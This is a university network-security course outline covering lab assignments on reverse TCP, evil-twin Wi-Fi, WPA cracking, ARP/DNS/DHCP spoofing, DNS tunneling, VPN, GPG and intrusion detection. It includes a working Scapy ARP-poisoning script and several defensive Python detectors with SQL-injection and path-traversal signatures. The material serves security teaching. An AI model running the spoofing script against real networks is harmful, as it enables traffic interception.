UNIVERSITY OF JYVÄSKYLÄ
TIES327 – Network Security (3-5 ECTS)
Autumn 2016
Prof. Timo Hämäläinen [email protected]
Department of Mathematical Information Technology
IT Faculty
University of Jyväskylä
Important note!
If you completed the "old course" TIES326 in 2012 or 2013, you will not get credits for TIES327, because about 30% of its assignments are the same as those of TIES326 in 2012 and 2013.
Students who completed TIES326 before 2012 can get credits for TIES327.
Goals of the course
Students understand what the term "security" covers, in particular from the point of view of networks and services
... get familiar with the different security aspects and understand the necessary terms
... are capable of applying the various tools in auditing and protecting against network attacks
... learn to look for new knowledge in this area
A feeling of safety must not rest on ignorance!
The course focuses on hands-on work with security issues and on learning through network security exercises you carry out yourself.
Remember: Use of the presented methods is illegal in public networks! They'll put you in a jail cell...
Prerequisites
Basic knowledge of networks, TCP/IP protocols and programming
For example the following courses (or equivalent knowledge):
ITKP101 - Tietokone ja tietoverkot työvälineenä
ITKP104 - Tietoverkot
ITKP102 - Ohjelmointi 1
How to complete the course?
Complete the assignments
Groups of 1-3 students
You need at least 50% of the total points and at least 50% of the points of each assignment. Answer all the questions presented in the assignments in depth in order to get the course completed.
We strongly encourage you to install and complete these exercises on your own devices. If that is not possible, send me an email and ask for a time slot in our lab to complete them there. If you are coming to the lab, read the assignment carefully and answer the preliminary questions before coming.
The course can be completed for 3-5 ECTS:
3 ECTS: complete assignments 1-3
4 ECTS: complete assignments 1-4
5 ECTS: complete all 5 assignments
About the assignments
1. Virtual Network Configuration and Introduction into Kali Linux
• In this first assignment, you will create and configure a virtual network which will be used for testing different kinds of network attacks.
• To do this you need a PC with at least 8 GB of RAM (more is of course better!).
• We use Ubuntu 16.04 on the host machine, but it is of course possible to build the same virtual network configuration on Windows or Mac OS by using the corresponding commands.
• https://www.virtualbox.org/
1.1 Virtual Network Configuration
1.2 Pentesting with Kali http://www.kali.org/
"From the creators of BackTrack comes Kali Linux, the most advanced and versatile penetration testing distribution ever created. BackTrack has grown far beyond its humble roots as a live CD and has now become a full-fledged operating system."
https://www.kali.org/penetration-testing-with-kali-linux/
In this assignment you are going to get familiar with some of the tools available in Kali. It is intended to build your basic skills and make you familiar with Kali features such as:
• Port scanning
• Finding security exploits
• SQL injection
• Password brute-forcing
• Denial-of-Service attack
• etc.
Kali tools: http://tools.kali.org/tools-listing
2. Attacks from the Outside and Wi-Fi Security Cracking
2.1 Reverse TCP attacks
In this tutorial, we get familiar with one dangerous attack, the reverse TCP connection. A firewall usually blocks incoming connections but does not block outgoing traffic; a reverse connection is therefore used to bypass firewall and router security restrictions.
For example, a Trojan horse running on a computer behind a firewall that blocks incoming connections can easily open an outbound connection to a remote host on the Internet. Once the connection is established, the remote host can send commands to the Trojan horse. Trojan horses that use a reverse connection usually send SYN (TCP) packets to the attacker's IP address. The attacker listens for these SYN packets and accepts the desired connections.
It will be shown how to establish a reverse TCP connection between a client and an external attacker machine with Kali Linux 2016.2 installed on it.
2.2 Wi-Fi "evil twin" attack
In this tutorial, the attacker is supposed to have two network interfaces. For example, you can have two wireless interfaces, or one wireless and one wired interface. We also assume that you install Kali Linux 2016.2 on the attacker machine. Your Wi-Fi router must support WPA encryption. Interface "eth0" is used to connect the attacker to the Internet, whereas "wlan0" will be used to create the "evil twin" access point.
Note that this tutorial and the next one should be done with real devices, not with the virtual network you configured earlier.
The attack presented in this tutorial is not the classical "evil twin" attack, in which the client automatically connects to the "evil" access point after being forced to disconnect from the legitimate one.
In our case, the attack is more a phishing attempt combined with a simple DDoS attack against the legitimate access point. Such an attack might take place in public places, such as big hotels or airports, where several access points have the same name: when a client cannot connect to a legitimate access point, he might try to connect to the "evil" one without noticing that it is unencrypted. In this tutorial, the attack is performed by using applications such as Aircrack, Mdk3 and Iptables.
2.3 WPA encryption cracking by dictionary attack
This tutorial explains how wireless networks encrypted with WPA are cracked by using dictionary attacks. For this tutorial, you are supposed to have two laptops with wireless interfaces (or one laptop and one smartphone) and a wireless access point, e.g. a WiFi router. One of the laptops will be used as the client and the other one as the attacker. In this tutorial, we assume that you install Kali Linux on the attacker machine. The WiFi router must support WPA encryption.
Although pure brute force is not effective for cracking WPA encryption, attackers are able to crack it with the help of different dictionary attacks. In this tutorial, this type of attack is demonstrated by using different Kali applications: Aircrack, Cowpatty, John The Ripper and Hashcat.
3. Attacks from the Inside and Man-In-The-Middle Attacks
3.1 ARP poisoning, DNS and DHCP spoofing
ARP poisoning is also known as ARP spoofing, ARP flooding and ARP poison routing. So what basically is ARP poisoning?
It is a technique which allows an attacker to sniff traffic on the LAN, monitor it and even stop it. ARP poisoning is done by sending fake or spoofed ARP messages onto the Ethernet LAN. By doing so the attacker manages to associate its own MAC address with the IP address of another node on the network (typically the default gateway's IP). Traffic meant for the gateway then goes first to the attacker and only then to the gateway, which allows the attacker to sniff traffic from the network.
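As an added defender-side example (not part of the course material), the following Python shows the detection side of the attack just described: it learns IP-to-MAC bindings from observed ARP replies, in the manner of arpwatch, and alerts when an IP that was bound to one MAC is suddenly claimed by another. The ARP records, addresses and the static gateway entry are constructed for the example.

```python
# Passive ARP monitor in the spirit of arpwatch (added example, not course
# code): learn IP -> MAC bindings from observed ARP replies and alert when a
# binding changes.  Runs offline on the constructed records below.
from collections import Counter

# Constructed records: (seconds since start, sender IP, sender MAC).
# 192.168.72.2 is the gateway at aa:aa:aa:aa:aa:01.  From t=30 a second MAC
# claims the same IP every 5 seconds (the cadence of the ARPpoisoning.py
# script shown later on this page); at t=60 the real gateway answers again.
ARP_REPLIES = [
    (0,  "192.168.72.2",   "aa:aa:aa:aa:aa:01"),
    (5,  "192.168.72.128", "08:00:27:11:22:33"),
    (10, "192.168.72.2",   "aa:aa:aa:aa:aa:01"),
    (30, "192.168.72.2",   "cc:cc:cc:cc:cc:99"),
    (35, "192.168.72.2",   "cc:cc:cc:cc:cc:99"),
    (40, "192.168.72.2",   "cc:cc:cc:cc:cc:99"),
    (60, "192.168.72.2",   "aa:aa:aa:aa:aa:01"),
]

# Static entries for hosts whose MAC is known for sure (here: the gateway).
TRUSTED = {"192.168.72.2": "aa:aa:aa:aa:aa:01"}


def detect_arp_conflicts(replies, trusted=None):
    """Return one alert per reply that contradicts the current binding.

    A trusted (static) binding is never overwritten, so every forged reply
    for the gateway is reported.  A binding learnt from traffic is reported
    once and then replaced, which also exposes a flip-flop when the real
    host answers again later.
    """
    trusted = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    bindings = dict(trusted)
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        known = bindings.get(ip)
        if known is None:
            bindings[ip] = mac                      # first sighting: learn it
        elif known != mac:
            alerts.append({"time": ts, "ip": ip, "expected": known,
                           "seen": mac, "static": ip in trusted})
            if ip not in trusted:
                bindings[ip] = mac                  # arpwatch-style "changed"
    return alerts


def offending_macs(alerts):
    """Count how many conflicting replies each MAC address sent."""
    return dict(Counter(a["seen"] for a in alerts))


if __name__ == "__main__":
    alerts = detect_arp_conflicts(ARP_REPLIES, TRUSTED)
    for a in alerts:
        print(f"t={a['time']:>3}s {a['ip']} expected {a['expected']} "
              f"but saw {a['seen']} (static={a['static']})")
    print("offenders:", offending_macs(alerts))
```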
3.1 DNS and DHCP spoofing
• The Domain Name System translates names that humans can understand into IP addresses. First, the client sends a DNS query and the DNS server answers with a DNS response. The DNS query and response carry an identical ID number and question. The client then updates its DNS cache with the domain name and IP address accordingly. Assume that the attacker wants to change the client's DNS cache so that traffic from the client to the domain web.seclab.jyu.fi is redirected to the attacker's server 192.168.1.102.
• For this purpose the attacker sniffs DNS queries from the client and waits for a DNS query with the relevant question; then the attacker spoofs a DNS response, e.g. with the attacker's IP. The client updates its DNS cache and therefore all traffic goes to the attacker. The attacker keeps spoofing DNS responses to maintain the poisoned cache entry. However, the DNS query eventually arrives at the DNS server, and the server responds with a legitimate DNS response. When the client gets the legitimate response, it updates its cache. For this reason, ARP poisoning of the client should be done before DNS spoofing. In this section, we show how to spoof the DNS server.
• DHCP (Dynamic Host Configuration Protocol) is used to configure the network settings of hosts on IP networks. DHCP allows hosts to be dynamically configured with an IP address, subnet mask, gateway address and DNS server address. It works as follows: first, the client sends (broadcasts) a DHCP Discover containing a transaction ID. The DHCP server responds with a DHCP Offer which contains the same transaction ID. The client then sends a DHCP Request and the DHCP server responds with a DHCP Ack. When applying a DHCP spoofing attack, the attacker waits for a DHCP Discover from the client. After getting this request, the attacker spoofs a DHCP Offer assigning a malicious gateway and/or DNS server. After that the client responds with a DHCP Request and the attacker spoofs a DHCP Ack as well. Finally, the client updates its DNS server and gateway addresses. However, when the DHCP Discover arrives at the DHCP server, this server responds to the client with a legitimate DHCP Offer. If the client gets the legitimate offer first, DHCP spoofing will not work. For this reason, the attacker DoSes the DHCP server during the attack so that the DHCP server cannot respond to clients.
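An added example, not from the course slides: both spoofing attacks above rely on the forged reply reaching the client before the legitimate one, while the real server's reply still arrives shortly afterwards carrying the same transaction ID. The Python below flags exactly that race, two replies to one DNS ID or DHCP xid that disagree on source or content within a short window; the observed replies, addresses and the 2-second window are constructed.

```python
# Added example (not course code): detect the reply race behind DNS and DHCP
# spoofing.  Both protocols match a reply to a request by a transaction ID,
# so two replies for one ID that disagree on source or content within a
# short time window mean that one of them was forged.
from collections import defaultdict

# Constructed observations of reply packets seen by a monitor on the LAN.
# "subject" is the DNS question name or the DHCP client MAC, "value" the
# answer the client would act on.
REPLIES = [
    # DNS: a spoofed answer forged with the resolver's address points the
    # client at the attacker's server; the real resolver answers 30 ms later.
    {"t": 10.001, "proto": "dns", "xid": 0x1A2B, "subject": "web.seclab.jyu.fi",
     "server": "192.168.1.2", "value": "192.168.1.102"},
    {"t": 10.031, "proto": "dns", "xid": 0x1A2B, "subject": "web.seclab.jyu.fi",
     "server": "192.168.1.2", "value": "192.168.1.80"},
    # DNS: a retransmitted answer with identical content is harmless.
    {"t": 12.000, "proto": "dns", "xid": 0x3C4D, "subject": "mail.example.test",
     "server": "192.168.1.2", "value": "192.168.1.25"},
    {"t": 12.400, "proto": "dns", "xid": 0x3C4D, "subject": "mail.example.test",
     "server": "192.168.1.2", "value": "192.168.1.25"},
    # DHCP: a rogue Offer for the client's transaction hands out a malicious
    # gateway; the legitimate server's Offer follows.
    {"t": 20.002, "proto": "dhcp", "xid": 0x5E1F, "subject": "08:00:27:11:22:33",
     "server": "192.168.1.102", "value": "gw=192.168.1.102"},
    {"t": 20.050, "proto": "dhcp", "xid": 0x5E1F, "subject": "08:00:27:11:22:33",
     "server": "192.168.1.1", "value": "gw=192.168.1.1"},
    # DHCP: the same xid reused by a later transaction is outside the window.
    {"t": 200.0, "proto": "dhcp", "xid": 0x5E1F, "subject": "08:00:27:11:22:33",
     "server": "192.168.1.1", "value": "gw=192.168.1.1"},
]


def detect_conflicting_replies(replies, window=2.0):
    """Return alerts for pairs of replies to one transaction that disagree.

    `first` is the reply the client has most likely already accepted (the
    forged one usually wins the race), `second` the late contradicting one.
    """
    seen = defaultdict(list)      # (proto, xid, subject) -> earlier replies
    alerts = []
    for r in sorted(replies, key=lambda x: x["t"]):
        key = (r["proto"], r["xid"], r["subject"])
        for earlier in seen[key]:
            if r["t"] - earlier["t"] > window:
                continue          # unrelated transaction reusing the ID
            if earlier["server"] != r["server"] or earlier["value"] != r["value"]:
                alerts.append({"proto": r["proto"], "subject": r["subject"],
                               "first": earlier, "second": r})
                break
        seen[key].append(r)
    return alerts


if __name__ == "__main__":
    for a in detect_conflicting_replies(REPLIES):
        print(f"{a['proto'].upper()} conflict for {a['subject']}: "
              f"{a['first']['server']} said {a['first']['value']!r}, then "
              f"{a['second']['server']} said {a['second']['value']!r}")
```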
3.2 HTTP content modification and attack against the bank user
Once an attacker is located in the middle between his victim and other network nodes, he can easily change the HTTP requests and responses which pass through him. In this section, the attacker changes web pages which the victim requested from a web site in order to make the victim feel nervous. For this attack, the attacker first spoofs the ARP cache of the victim in order to be "in the middle". Then, when the victim requests a web page, he modifies the content (pictures etc.) of the page and sends the result to the victim.
3.3 DNS tunneling attack
With DNS tunneling, another protocol can be tunneled through DNS. For tunneling to work, a client-server model is used. The client is typically behind the organization's security controls and the server is located somewhere on the Internet. The DNS communication between the client and server occurs over the organization's own DNS infrastructure and any other public DNS servers. Since this is a client-server model, any type of traffic can be sent over the tunnel. Some tunnel applications even provide encryption.
In this tutorial, we consider the following scenario. The malicious actor manages to compromise a host in our LAN by social engineering and installs the DNS tunnel client software. The DNS tunnel client is configured to use the LAN's internal DNS server (192.168.1.2). The internal DNS server forwards non-cached requests to an upstream/public DNS server (192.168.1.1). Our external attacker installs and configures the DNS tunnel server on his machine. We further assume that the external attacker has a registered domain name and, therefore, all DNS requests for that domain are forwarded to the DNS tunnel server. The malicious actor is then able to send data back and forth between the client and the server.
4. Public-Key Cryptography
4.1 Configuring a VPN connection with the help of OpenVPN
This tutorial explains how to configure a simple OpenVPN server and client, set up your own Certificate Authority (CA), generate keys and sign certificates. In addition, it shortly describes dual-factor authentication based on username and password, which the server uses for authenticating a connecting client.
OpenVPN is a full-featured SSL VPN which implements secure network extension using the industry-standard SSL/TLS protocol, supports flexible client authentication methods based on certificates, smart cards, and/or username/password credentials, and allows user- or group-specific access control policies using firewall rules applied to the VPN virtual interface.
4.2 Public-key cryptography with GPG
This tutorial explains how to configure a Public Key Infrastructure (PKI), encrypt files and sign emails by using GNU Privacy Guard (GPG).
• Public-key cryptography allows you to communicate with someone securely without exchanging a secret password first. With public-key encryption, instead of sharing a password, each party generates a "keypair" consisting of a "public" key and a "secret/private" key.
• Each party can then publish their "public" key to the world or send it directly to the other party, while keeping their secret key private and safe. If you have a person's public key, you can do a few things with it:
  • Encrypt a message that only that person can decrypt (they need their secret key to decrypt it).
  • Validate that the person signed a message with their secret key. This also lets you verify strongly that the message was not corrupted or modified in transmission.
• With your secret key, you can do the following things:
  • Decrypt messages encrypted with your public key.
  • Sign messages that others can verify came from you (they need your public key to verify the signature).
• GNU Privacy Guard is the GNU project's complete and free implementation of the OpenPGP standard as defined by RFC 4880. GPG allows you to encrypt and sign your data and communication, and features a versatile key management system as well as access modules for all kinds of public key directories.
5. Signature-Based and Anomaly-Based Intrusion Detection
5.1 Signature-based intrusion detection
Nowadays, due to the exponentially growing number of network attacks, intrusion detection has become an important area of research. In this tutorial, we get familiar with the signature-based approach to intrusion detection. First, we analyze a small pcap file which contains network traffic sent to a web service during two hours. Most of the traffic stored in this file is legitimate, but there is also intrusive traffic that we try to find by applying a signature-based detection approach that relies on analysis of the payload of network packets. After that, we get familiar with Snort, a free and open source network intrusion detection and prevention system.
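Added example, not from the course: a minimal payload signature matcher in Python over a handful of constructed HTTP request payloads, the kind of payload-based detection the assignment asks for before moving on to Snort. It also shows why the payload should be percent-decoded before matching: an encoded request otherwise slips past a plain-text signature. The payloads, host name and the three signature patterns are constructed for the example.

```python
# Added example (not course code): a minimal payload signature matcher, the
# approach the assignment applies to the pcap before moving on to Snort.
import re
from urllib.parse import unquote_to_bytes

# Constructed HTTP request payloads standing in for packets of the capture.
PACKETS = [
    b"GET /index.html HTTP/1.1\r\nHost: web.seclab.jyu.fi\r\n\r\n",
    b"GET /login.php?user=admin'%20OR%20'1'='1&pw=x HTTP/1.1\r\n"
    b"Host: web.seclab.jyu.fi\r\n\r\n",
    b"GET /../../../../etc/passwd HTTP/1.1\r\nHost: web.seclab.jyu.fi\r\n\r\n",
    b"POST /search HTTP/1.1\r\nHost: web.seclab.jyu.fi\r\n"
    b"Content-Length: 46\r\n\r\nq=x%20UNION%20SELECT%20password%20FROM%20users",
    b"GET /images/logo.png HTTP/1.1\r\nHost: web.seclab.jyu.fi\r\n\r\n",
]

# (name, pattern) pairs in the spirit of Snort content/pcre rules.
SIGNATURES = [
    ("sqli-tautology", re.compile(rb"'\s*or\s+'[^']*'\s*=\s*'", re.IGNORECASE)),
    ("sqli-union",     re.compile(rb"\bunion\s+(?:all\s+)?select\b", re.IGNORECASE)),
    ("path-traversal", re.compile(rb"(?:\.\./){2,}")),
]


def normalise(payload):
    """Percent-decode once so that an encoded request is matched against the
    same signature as its plain form (a common evasion otherwise)."""
    return unquote_to_bytes(payload)


def scan_payloads(packets, signatures, decode=True):
    """Return (packet index, signature name) for every signature hit."""
    hits = []
    for idx, raw in enumerate(packets):
        data = normalise(raw) if decode else raw
        for name, pattern in signatures:
            if pattern.search(data):
                hits.append((idx, name))
    return hits


if __name__ == "__main__":
    print("decoded:", scan_payloads(PACKETS, SIGNATURES))
    print("raw    :", scan_payloads(PACKETS, SIGNATURES, decode=False))
```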
5.1 Payload-based and header-based intrusion detection
The recent rise in the amount of traffic and the increase in line speed put a heavy computational load and resource consumption on such traditional payload-based IDSs. Compared to payload-based intrusion detection, the analysis of information in packet headers handles a considerably lower amount of data. However, since header measurements provide only an aggregated view of the data transferred over the network, they cannot reach the accuracy of the payload-based approach. Thus, a header-based IDS is not supposed to completely substitute a payload-based system, but it can be used along with it to allow early detection in environments in which payload-based inspection does not scale.
In this section, we analyze information contained in packet headers and apply an anomaly-based detection approach. Such an approach searches for a sample that deviates significantly from the expected behavior and classifies such a sample as an anomaly. In this tutorial, we calculate the sample entropy of different parameters extracted from packet headers to find network anomalies.
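Added example (not part of the course material): the sample entropy of one header field per time window, with a leave-one-out z-score to pick out the window whose distribution differs from the rest. The traffic is constructed: four minutes of browsing from eight hosts, and one minute in which a single host contacts 40 distinct ports, which drives source-address entropy to zero and destination-port entropy up; the 60-second window, the z threshold and the minimum standard deviation are assumptions.

```python
# Added example (not course code): header-based anomaly detection with the
# sample entropy of one header field per time window, plus a leave-one-out
# z-score so that the outlier window cannot inflate its own baseline.
import math
import random
from collections import Counter, defaultdict

WINDOW = 60  # seconds per analysis window (assumed)


def shannon_entropy(values):
    """Sample entropy in bits of the empirical distribution of `values`."""
    counts = Counter(values)
    n = len(values)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def window_entropies(packets, field):
    """{window index: entropy of `field` among the packets in that window}."""
    buckets = defaultdict(list)
    for pkt in packets:
        buckets[int(pkt["t"] // WINDOW)].append(pkt[field])
    return {w: shannon_entropy(v) for w, v in sorted(buckets.items())}


def flag_anomalies(entropies, threshold=3.0, min_std=0.1):
    """Windows whose entropy lies more than `threshold` standard deviations
    from the mean of the other windows.  `min_std` keeps a near-constant
    baseline from turning tiny fluctuations into huge scores."""
    flagged = {}
    for w, e in entropies.items():
        others = [v for k, v in entropies.items() if k != w]
        if not others:
            continue
        mean = sum(others) / len(others)
        std = math.sqrt(sum((v - mean) ** 2 for v in others) / len(others))
        z = abs(e - mean) / max(std, min_std)
        if z > threshold:
            flagged[w] = round(z, 2)
    return flagged


def build_sample():
    """Constructed traffic: minutes 0, 1, 2 and 4 hold ordinary web requests
    from eight hosts (mostly port 80, some 443); in minute 3 one host
    contacts 40 different ports, the header footprint of a port scan."""
    rng = random.Random(2016)
    pkts = []
    for minute in (0, 1, 2, 4):
        for i in range(20):
            pkts.append({"t": minute * WINDOW + 3 * i,
                         "src": f"10.0.0.{rng.randint(1, 8)}",
                         "dport": rng.choice([80] * 7 + [443] * 3)})
    for i in range(40):
        pkts.append({"t": 3 * WINDOW + i, "src": "10.0.0.99", "dport": 1000 + i})
    return pkts


if __name__ == "__main__":
    pkts = build_sample()
    for field in ("src", "dport"):
        ent = window_entropies(pkts, field)
        print(field, {w: round(e, 2) for w, e in ent.items()},
              "anomalous:", flag_anomalies(ent))
```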
Tools used in assignments
Kali Linux: http://www.kali.org/
https://www.kali.org/penetration-testing-with-kali-linux/
Scapy: http://secdev.org/projects/scapy/
Wireshark: http://www.wireshark.org/
pfSense: http://www.pfsense.org/
OpenVPN: https://openvpn.net/
GNU Privacy Guard (GPG): https://www.gnupg.org/
Snort: http://www.snort.org/
An example: ARPpoisoning.py

from scapy.all import *
from time import sleep
import threading
import os, sys

class SpoofThread(threading.Thread):
    def __init__(self, victim, gateway):
        # ARP packet claiming the gateway's IP (psrc), addressed to the victim (pdst)
        self.packet = ARP()
        self.packet.psrc = gateway
        self.packet.pdst = victim
        threading.Thread.__init__(self)

    def run(self):
        counter = 0
        print("spoofing " + str(self.packet.pdst) + " every 5 seconds...")
        try:
            while 1:
                send(self.packet, verbose=0)
                counter += 1
                print('poison #' + str(counter))
                sleep(5)
        except Exception as e:
            print(type(e))
            print(e.args)
            print(e)

if __name__ == '__main__':
    if len(sys.argv) != 3:
        sys.exit('Usage: %s <victim(s) IP(s)> <spoofed source IP> \n example: python ArpSpoofing.py 192.168.72.128 192.168.72.2' % os.path.basename(__file__))
    targets_dest_ips = [sys.argv[1]]
    spoofed_src_ip = sys.argv[2]   # a plain string; the original wrapped it in a list
    for ip in targets_dest_ips:
        SpoofThread(ip, spoofed_src_ip).start()
Course grading
Total points required for each grade (3 ECTS: max. 45 p., 4 ECTS: max. 60 p., 5 ECTS: max. 70 p.):
3 ECTS   4 ECTS   5 ECTS   GRADE
  43       58       67       5
  38       51       61       4
  33       44       54       3
  28       37       45       2
  23       30       35       1
Workload:
Ca. 100-120 hours, consisting of some lectures and, as the main task, completing the assignments (xx hours, of course depending on your background skills).
About the lectures
The lectures are intended to provide an introduction to the different network security topics and examples.
The course focuses on hands-on work with security issues and learning by doing (not learning by listening!!).
Some literature:
• Lots of research papers
  - IEEE Xplore, http://ieeexplore.ieee.org/Xplore/dynhome.jsp
  - ACM, http://portal.acm.org/dl.cfm
  - Google Scholar, http://scholar.google.com/
  - http://site.ebrary.com/lib/jyvaskyla
• Introduction to Network Security
• Hacking Exposed Web 2.0: Web 2.0 Security Secrets and Solutions
• CEH: Certified Ethical Hacker Study Guide
L1: Introduction to network security
What is security and what are its goals
Threats to networks and IT systems
Security policies
Risk calculation
Security offenses
Social engineering
Phishing
Legislation
L2: Protecting your networked services (visiting lecture by Tapio Väärämäki, Exclusive Networks Finland)
CARM – Cyber Attack Remediation and Mitigation
UTM (Unified Threat Management)
NGFW (Next Generation Firewall)
WAF (Web Application Firewall)
Database Security
File Security
Endpoint Security
L3: Auditing networking security (visiting lecture by Matti Kannela)
Information security as a concept
Technical security vs. processes / controls / humans.
Examples and cases ’from the field’.
How to create solid IS fundamentals and standards?
Why bad things happen and how to prevent them?
Change management explained
L4: Monitoring and analysing the network data
Normal network behaviour
Anomaly detection
How to gather data
Pre-processing and analysing the data
L5: Security Issues for 4/5G Cellular Networks, IoT
Cellular network security issues (PHY/MAC layers)
Different security threats
User identity
Femtocells
Interoperability
RRC signalling
Other threats
Being all-IP networks makes these systems vulnerable to IP attacks, such as DoS over the public IP addresses of the core network interfaces, traffic eavesdropping and injection attacks.
IoT security issues
Some links
https://www.viestintavirasto.fi/kyberturvallisuus.html
http://www.iltasanomat.fi/digitoday/tietoturva/
Vulnerabilities
http://www.securityfocus.com
Advanced Persistent Threat
https://www.secureworks.com/capabilities/threat-intelligence/advanced-threats